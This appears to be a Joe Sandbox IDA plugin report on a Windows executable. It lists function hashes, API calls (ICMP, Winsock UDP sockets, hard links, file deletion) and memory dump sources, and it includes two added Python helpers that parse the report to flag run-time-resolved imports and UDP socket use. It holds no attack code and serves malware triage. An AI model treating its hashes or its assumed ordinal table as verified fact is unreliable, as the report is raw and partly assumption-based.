                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-1816364905
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,?,?,00000000,?,?,00000101,?), ref: 004343DE
                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-58917771
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-3530519716
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39
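The kernel32.dll block and the three ICMP.DLL blocks above all show the same pattern: a LoadLibraryA call immediately followed by GetProcAddress, so GetSystemWow64DirectoryW, IcmpSendEcho, IcmpCloseHandle and IcmpCreateFile are resolved at run time and do not appear in the sample's static import table. The script below is an added example, not part of the Joe Sandbox report or of the sample. It parses the report's "APIs" lines (its input is copied verbatim from this section) and pairs each LoadLibraryA with the GetProcAddress that follows it, so an analyst can list the run-time-resolved imports per DLL. Pairing by order is an assumption: the trace prints the module handle argument of GetProcAddress as 00000000, so the two calls cannot be linked by handle value. The ICMP watchlist is the analyst's own choice, not something the report defines.

```python
import re
from typing import Dict, List, Tuple

# One "APIs" entry as Joe Sandbox prints it, e.g.
#   • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
API_LINE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Input: the APIs lines of the four blocks in this section, copied from the report.
REPORT_API_LINES = """
• LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
• LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,?,?,00000000,?,?,00000101,?), ref: 004343DE
• GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
• LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
• GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
• LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
• GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
"""

# Analyst-chosen watchlist (an assumption, not defined by the report): the ICMP
# helper functions this sample resolves at run time instead of importing.
ICMP_WATCHLIST = {"IcmpCreateFile", "IcmpSendEcho", "IcmpCloseHandle"}


def parse_api_lines(text: str) -> List[Dict[str, object]]:
    """Turn each 'Api.MODULE(args), ref: ADDR' line into a dict; skip anything else."""
    calls: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [a.strip() for a in m.group("args").split(",")],
            "ref": int(m.group("ref"), 16),   # call-site address as an int
        })
    return calls


def resolved_imports(calls: List[Dict[str, object]]) -> List[Tuple[str, str, int]]:
    """Pair each LoadLibraryA(dll) with the next GetProcAddress(_, name).

    Assumption: the calls are paired by order. The report prints the handle
    passed to GetProcAddress as 00000000, so the handle value cannot be used.
    Returns (dll, function, address of the GetProcAddress call).
    """
    pairs: List[Tuple[str, str, int]] = []
    pending_dll = None
    for c in calls:
        if c["api"] == "LoadLibraryA":
            pending_dll = c["args"][0]          # first argument is the DLL name
        elif c["api"] == "GetProcAddress" and pending_dll is not None:
            pairs.append((pending_dll, c["args"][1], c["ref"]))  # second arg is the name
            pending_dll = None
    return pairs


def group_by_dll(pairs: List[Tuple[str, str, int]]) -> Dict[str, List[str]]:
    """Group resolved function names under their (lower-cased) DLL name."""
    grouped: Dict[str, List[str]] = {}
    for dll, fn, _ in pairs:
        grouped.setdefault(dll.lower(), []).append(fn)
    return grouped


def watchlist_hits(pairs: List[Tuple[str, str, int]], watchlist) -> List[Tuple[str, str]]:
    """Return (function, call-site hex) for every resolved name on the watchlist, sorted by name."""
    hits = [(fn, f"{ref:08X}") for _, fn, ref in pairs if fn in watchlist]
    return sorted(hits)


if __name__ == "__main__":
    calls = parse_api_lines(REPORT_API_LINES)
    pairs = resolved_imports(calls)
    for dll, fns in group_by_dll(pairs).items():
        print(f"{dll}: {', '.join(fns)}")
    for fn, where in watchlist_hits(pairs, ICMP_WATCHLIST):
        print(f"watchlist: {fn} resolved at {where}")
```

Run as a script it prints one line per DLL with the functions the sample fetches from it, then the ICMP hits with the address of each GetProcAddress call. The order-based pairing is safe for this section because every block holds exactly one LoadLibraryA and one GetProcAddress; for a report where a single LoadLibraryA feeds several GetProcAddress calls, the pairing loop would need to keep the DLL pending instead of clearing it after the first match.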
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
• GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-275556492
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ClearVariant
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3e9ce65d11b316350caf6cb0db2ee4373dc883206541589756c66e9508b68ec6
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e9ce65d11b316350caf6cb0db2ee4373dc883206541589756c66e9508b68ec6
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • __flush.LIBCMT ref: 00414630
                                                                                                                                                                                                                                                                                                                                                                                                                • __fileno.LIBCMT ref: 00414650
                                                                                                                                                                                                                                                                                                                                                                                                                • __locking.LIBCMT ref: 00414657
                                                                                                                                                                                                                                                                                                                                                                                                                • __flsbuf.LIBCMT ref: 00414682
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3240763771-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00478259
• VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
• VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: CopyVariant$ErrorLast
• String ID:
• API String ID: 2286883814-0
• Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
• Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
• Opcode Fuzzy Hash: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
• Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
• WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
• #21.WSOCK32 ref: 004740E0
• WSAGetLastError.WSOCK32(00000000), ref: 004740EB
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: ErrorLast$socket
• String ID:
• API String ID: 1881357543-0
• Opcode ID: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
• Instruction ID: ff1742a21ceaee7448286ece46cbaad1fa76dded649dcd1b12ff87c083dae87e
• Opcode Fuzzy Hash: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
• Instruction Fuzzy Hash: 7641D9717403006AE720BF6ADC47F5672C89B54B18F14496EF648BF2C3D6FAA881869C
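The socket entry above is only useful to a triager once its raw arguments are decoded: socket(00000002,00000002,00000011) is an AF_INET, SOCK_DGRAM, IPPROTO_UDP socket, and "#21.WSOCK32" is an import by ordinal. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses the "APIs" lines of a function entry into records, resolves the Winsock constants, and flags UDP socket creation. The sample input is the four API lines of this entry copied from the report. The ordinal-to-name table is an assumption taken from the commonly published WSOCK32/WS2_32 export order (21 = setsockopt); verify it against the DLL's export table before relying on it.

```python
"""Decode the per-function "APIs" listing of a Joe Sandbox report.

Added example, not part of the sandbox report: it turns lines such as
"socket.WSOCK32(00000002,00000002,00000011), ref: 00474068" into structured
records and resolves the socket() constants so an analyst can see at a glance
that the sample creates an AF_INET / SOCK_DGRAM / IPPROTO_UDP socket.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed input: the four "APIs" lines of the socket/WSAGetLastError entry above.
SAMPLE_API_LINES = """\
• socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
• WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
• #21.WSOCK32 ref: 004740E0
• WSAGetLastError.WSOCK32(00000000), ref: 004740EB
"""

# Matches "• name.MODULE(args), ref: ADDR" and the argument-less "• name.MODULE ref: ADDR" form.
API_LINE = re.compile(
    r"^\s*•\s*(?P<name>[#\w:~]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Winsock constants (documented values).
ADDRESS_FAMILY = {2: "AF_INET", 23: "AF_INET6"}
SOCKET_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
PROTOCOL = {0: "IPPROTO_DEFAULT", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}

# Assumption: import-by-ordinal table for WSOCK32/WS2_32 as commonly published.
# Verify against the DLL's export table (dumpbin /exports) before relying on it.
WINSOCK_ORDINALS = {
    1: "accept", 2: "bind", 3: "closesocket", 4: "connect", 16: "recv",
    17: "recvfrom", 19: "send", 20: "sendto", 21: "setsockopt", 23: "socket",
}


@dataclass
class ApiCall:
    name: str                   # API name, or "#N" when imported by ordinal
    module: str                 # e.g. WSOCK32, KERNEL32, USER32
    args: List[Optional[int]]   # None for "?" (value not recovered by the sandbox)
    ref: int                    # call-site address inside the sample's image
    ordinal: Optional[int] = None


def _parse_arg(token: str) -> Optional[int]:
    token = token.strip()
    return None if token == "?" else int(token, 16)   # handles "-00000058" as well


def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [_parse_arg(t) for t in m["args"].split(",")] if m["args"] else []
        ordinal = int(m["name"][1:]) if m["name"].startswith("#") else None
        calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), ordinal))
    return calls


def resolve_ordinal(module: str, ordinal: int) -> str:
    if module.upper() in ("WSOCK32", "WS2_32"):
        return WINSOCK_ORDINALS.get(ordinal, f"#{ordinal}")
    return f"#{ordinal}"


def describe(call: ApiCall) -> str:
    name = resolve_ordinal(call.module, call.ordinal) if call.ordinal is not None else call.name
    if name == "socket" and len(call.args) >= 3 and None not in call.args[:3]:
        af, st, pr = call.args[:3]
        return (f"socket({ADDRESS_FAMILY.get(af, af)}, {SOCKET_TYPE.get(st, st)}, "
                f"{PROTOCOL.get(pr, pr)}) @ {call.ref:08X}")
    shown = ",".join("?" if a is None else f"{a:#x}" for a in call.args)
    return f"{name}({shown}) @ {call.ref:08X}"


def creates_udp_socket(calls: List[ApiCall]) -> bool:
    """True if any socket() call asks for SOCK_DGRAM with IPPROTO_UDP (or the default protocol)."""
    return any(c.name == "socket" and len(c.args) >= 3 and c.args[1] == 2 and c.args[2] in (0, 17)
               for c in calls)


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_API_LINES)
    for c in parsed:
        print(describe(c))
    print("UDP socket created:", creates_udp_socket(parsed))
```

The same parser accepts the other entries on this page (for example the MultiByteToWideChar lines, where "?" arguments become None), so it can be run over a whole report dump to list every function that opens a network socket and the call-site addresses to inspect in the disassembly.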
APIs
• ClientToScreen.USER32(00000000,?), ref: 00441CDE
• GetWindowRect.USER32(?,?), ref: 00441D5A
• PtInRect.USER32(?,?,?), ref: 00441D6F
• MessageBeep.USER32(00000000), ref: 00441DF2
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
• Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
• Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
• Opcode Fuzzy Hash: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
• Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
• __isleadbyte_l.LIBCMT ref: 004238B2
• MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
• MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3058430110-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0045D12B
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0045D16A
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
